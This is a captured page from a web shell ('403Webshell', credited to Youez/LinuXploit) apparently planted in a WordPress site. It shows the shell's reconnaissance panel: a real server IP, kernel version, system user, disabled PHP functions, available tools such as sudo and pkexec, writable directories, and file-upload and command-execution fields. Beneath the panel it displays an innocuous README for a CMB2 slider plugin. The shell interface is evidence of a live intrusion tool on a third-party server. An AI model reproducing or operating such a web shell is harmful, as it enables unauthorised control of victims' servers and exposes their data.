403Webshell

Warning: set_time_limit() has been disabled for security reasons in /home/domains/vol3/223/3261223/user/htdocs/wp-content/plugins/contact-form-7/wp-contact-form-7.php on line 26
Server IP : 77.68.64.20  /  Your IP : 216.73.216.231
Web Server : Apache
System : Linux hp3-wp-1011484.hostingp3.local 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
User : csh2668037 ( 2112352)
PHP Version : 7.4.33
Disable Function : shell_exec,exec,system,popen,set_time_limit
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/domains/vol3/223/3261223/user/htdocs/wp-content/plugins/cmb2-field-slider/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/domains/vol3/223/3261223/user/htdocs/wp-content/plugins/cmb2-field-slider/README.md
# CMB2 Field Type: Slider

## Desc
Slider field type for CMB2.

##Install
You can install slider field as a Wordpress plugin

1. Download plugin
2. Place in `wp-content/plugins` directory
3. Active in Wordpress plugin section

## Use
`own_slider` as a field type.

```php
array(
	'name'        => 'Slider Field',
	'desc'        => 'Set your value.',
	'id'          => $prefix . 'slider',
	'type'        => 'own_slider',
	'min'         => '0',
	'max'         => '200',
	'step'        => '5',
	'default'     => '0', // start value
	'value_label' => 'Value:',
),
```
## Screenshots

![Image](screen-1.jpg?raw=true)

## Changelog

## 1.1.2 - 04-12-2016

* Added support for repeatable group ( [#3](https://github.com/mattkrupnik/cmb2-field-slider/issues/3) ).
* Added `step` attribute by [jondcampbell](https://github.com/jondcampbell), ( [#5](https://github.com/mattkrupnik/cmb2-field-slider/pull/5) ).

Youez - 2016 - github.com/yon3zu
LinuXploit